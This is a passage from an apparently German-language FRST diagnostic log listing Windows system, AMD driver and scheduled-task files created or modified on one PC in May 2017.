2017-05-07 18:11 - 2017-05-07 18:11 - 02085280 _____ (Microsoft Corporation) C:\WINDOWS\system32\UpdateAgent.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01854880 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntVirtualization.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01657344 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01628160 _____ (Microsoft Corporation) C:\WINDOWS\system32\comsvcs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01611776 _____ (Microsoft Corporation) C:\WINDOWS\system32\SpeechPal.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01605632 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01600512 _____ (Microsoft Corporation) C:\WINDOWS\system32\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01583616 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01506816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\quartz.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01468416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01463296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01452960 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppVEntSubsystemController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01433600 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettings.Handlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01356800 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01320352 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpx.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01295872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01291776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01269760 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01257472 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01242624 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 01103872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01087488 _____ (Microsoft Corporation) C:\WINDOWS\system32\reseteng.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 01024416 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00987648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wpnapps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00980992 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthport.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00974848 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00909312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00864256 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00805888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00750080 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00741784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Shell.Broker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00731136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmgaserver.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00716440 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVideoDSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00712600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms2.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00707072 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00687104 _____ (Microsoft Corporation) C:\WINDOWS\system32\LogonController.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673280 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockAppBroker.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00673112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00651680 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00647168 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00626520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00624640 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00590848 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00585728 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00559000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00524800 _____ (Microsoft Corporation) C:\WINDOWS\system32\TileDataRepository.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00523296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppResolver.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00507392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00476672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneDriveSettingSyncProvider.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00450048 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcdedit.exe
2017-05-07 18:11 - 2017-05-07 18:11 - 00433664 _____ (Microsoft Corporation) C:\WINDOWS\system32\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00429568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2017-05-07 18:11 - 2017-05-07 18:11 - 00409600 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00409504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00392704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToManager.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00364032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msIso.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00362496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00358400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcryptprimitives.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00354304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputSwitch.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00347136 _____ (Microsoft Corporation) C:\WINDOWS\system32\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00334336 _____ (Microsoft Corporation) C:\WINDOWS\system32\wc_storage.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\NotificationObjFactory.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00311192 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00301056 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseAppMgmtSvc.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00296448 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00282112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VEEventDispatcher.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00280064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\XpsDocumentTargetPrint.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00251904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Preview.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00246272 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00233472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232960 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmcsp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00232448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00208896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.AppDefaults.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00203776 _____ (Microsoft Corporation) C:\WINDOWS\system32\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PackageStateRoaming.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00164864 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseModernAppMgmtCSP.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\VEStoreEventHandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00142240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00118784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netvsc.sys
2017-05-07 18:11 - 2017-05-07 18:11 - 00105456 _____ (Microsoft Corporation) C:\WINDOWS\system32\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00095584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\imagehlp.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00091648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00087552 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmjpegdec.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00078336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\asycfilt.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00057856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offreg.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00050176 _____ (Microsoft Corporation) C:\WINDOWS\system32\catsrvps.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00047104 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-05-07 18:11 - 2017-05-07 18:11 - 00032004 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-05-07 18:09 - 2017-05-07 18:09 - 00008192 _____ C:\WINDOWS\system32\config\userdiff
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\WINDOWS\SysWOW64\XPSViewer
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files\MSBuild
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies
2017-05-07 18:09 - 2017-05-07 18:09 - 00000000 ____D C:\Program Files (x86)\MSBuild
2017-05-07 18:09 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\ServiceProfiles
2017-05-07 18:09 - 2017-02-10 12:26 - 01166520 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00124624 _____ (Microsoft Corporation) C:\WINDOWS\system32\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:26 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\system32\TsWpfWrp.exe
2017-05-07 18:09 - 2017-02-10 12:21 - 00778936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00103120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PresentationCFFRasterizerNative_v0300.dll
2017-05-07 18:09 - 2017-02-10 12:21 - 00035480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TsWpfWrp.exe
2017-05-07 17:23 - 2017-05-22 18:36 - 02049386 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagwrn.xml
2017-05-07 17:18 - 2017-05-07 17:18 - 00007623 _____ C:\WINDOWS\diagerr.xml
2017-05-07 17:17 - 2017-05-22 18:29 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-05-07 17:17 - 2017-05-07 21:26 - 00003268 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-05-07 17:17 - 2017-05-07 17:20 - 00004440 _____ C:\WINDOWS\System32\Tasks\Adobe Flash Player Updater
2017-05-07 17:17 - 2017-05-07 17:17 - 00003556 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-05-07 17:17 - 2017-05-07 17:17 - 00003332 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-05-07 17:17 - 2017-05-07 17:17 - 00003282 _____ C:\WINDOWS\System32\Tasks\{E0FE36B0-5755-811B-E0F2-0AF91728DCC9}
2017-05-07 17:17 - 2017-05-07 17:17 - 00003084 _____ C:\WINDOWS\System32\Tasks\{522333AA-23D9-85D6-489B-224F78B46908}
2017-05-07 17:17 - 2017-05-07 17:17 - 00002736 _____ C:\WINDOWS\System32\Tasks\AutoKMS
2017-05-07 17:17 - 2017-05-07 17:17 - 00002668 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
2017-05-07 17:17 - 2017-05-07 17:17 - 00002580 _____ C:\WINDOWS\System32\Tasks\SamsungMagician
2017-05-07 17:17 - 2017-05-07 17:17 - 00002388 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\Safer-Networking
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\WINDOWS\System32\Tasks\ASUS
2017-05-07 17:17 - 2017-05-07 17:17 - 00000000 ____D C:\ProgramData\USOShared
2017-05-07 17:15 - 2017-05-07 17:15 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk
2017-05-07 17:15 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-05-07 17:14 - 2017-05-14 22:59 - 00000000 ____D C:\Users\Dino
2017-05-07 17:14 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Vorlagen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Startmenü
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Netzwerkumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Lokale Einstellungen
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Eigene Dateien
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Druckumgebung
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programme
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Verlauf
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\AppData\Local\Anwendungsdaten
2017-05-07 17:14 - 2017-05-07 17:14 - 00000000 _SHDL C:\Users\Dino\Anwendungsdaten
2017-05-07 17:13 - 2017-05-22 18:28 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2017-05-07 17:13 - 2017-05-21 20:55 - 00342672 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-05-07 17:13 - 2017-05-17 21:18 - 00000000 ____D C:\Program Files\AMD
2017-05-07 17:13 - 2017-05-16 18:16 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-05-07 17:13 - 2017-05-07 17:14 - 00000000 ____D C:\Program Files (x86)\ASUS
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_User_ASMBSW_01_11_00.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_TeeDriverx64_01011.Wdf
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Realtek
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\Common Files\ATI Technologies
2017-05-07 17:13 - 2017-05-07 17:13 - 00000000 ____D C:\Program Files\ASUS
2017-05-07 17:13 - 2013-07-04 03:32 - 00028672 _____ (ASUSTek Computer Inc.) C:\WINDOWS\SysWOW64\AsIO.dll
2017-05-07 17:13 - 2013-07-04 03:32 - 00015232 _____ C:\WINDOWS\SysWOW64\Drivers\AsIO.sys
2017-05-07 13:03 - 2017-05-07 21:24 - 00000000 ___DC C:\WINDOWS\Panther
2017-05-03 17:47 - 2017-05-03 17:47 - 00001256 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Update- und Datenschutzeinstellungen.lnk
2017-05-03 17:47 - 2017-05-03 17:47 - 00000000 ____D C:\Users\Dino\AppData\Local\UNP
2017-05-03 17:21 - 2017-05-07 17:16 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-05-03 17:21 - 2017-05-03 17:22 - 00000000 ____D C:\Program Files\UNP
2017-05-01 12:45 - 2017-05-07 17:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Problem Report Wizard
2017-05-01 12:45 - 2017-05-01 12:45 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\AMD
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-05-22 18:36 - 2017-03-20 06:41 - 00908736 _____ C:\WINDOWS\system32\perfh007.dat
2017-05-22 18:36 - 2017-03-20 06:41 - 00192916 _____ C:\WINDOWS\system32\perfc007.dat
2017-05-22 18:34 - 2017-03-18 13:40 - 00065536 _____ C:\WINDOWS\system32\config\ELAM
2017-05-22 18:34 - 2016-12-06 18:58 - 00000000 ____D C:\Users\Dino\AppData\LocalLow\Mozilla
2017-05-22 18:29 - 2017-02-05 21:11 - 00000000 ____D C:\Program Files\Bitdefender Agent
2017-05-22 18:29 - 2015-08-16 13:47 - 00000000 ___RD C:\Users\Dino\OneDrive
2017-05-22 18:28 - 2017-03-18 13:40 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-05-22 18:28 - 2017-02-05 21:38 - 00015703 _____ C:\bdlog.txt
2017-05-22 18:20 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-22 18:14 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-22 17:52 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-05-21 21:36 - 2015-04-25 17:41 - 00000000 ____D C:\Program Files (x86)\Steam
2017-05-21 20:55 - 2017-02-05 21:39 - 00000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2017-05-21 20:54 - 2017-02-05 21:41 - 00000085 _____ C:\WINDOWS\wininit.ini
2017-05-21 20:54 - 2017-02-05 21:40 - 00000000 ____D C:\ProgramData\Spybot - Search & Destroy
2017-05-20 14:33 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\System
2017-05-19 14:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-05-19 14:20 - 2015-10-30 20:47 - 00000000 ____D C:\WINDOWS\ShellNew
2017-05-19 14:20 - 2013-08-22 15:25 - 00000076 _____ C:\WINDOWS\win.ini
2017-05-19 14:16 - 2017-02-05 20:54 - 00001079 _____ C:\Users\Public\Desktop\Revo Uninstaller.lnk
2017-05-19 14:16 - 2017-02-05 20:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Revo Uninstaller
2017-05-17 21:18 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-05-17 21:18 - 2015-04-25 06:40 - 00000000 ____D C:\AMD
2017-05-16 18:06 - 2017-04-14 21:33 - 00924544 _____ (AMD) C:\WINDOWS\system32\coinst_17.10.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
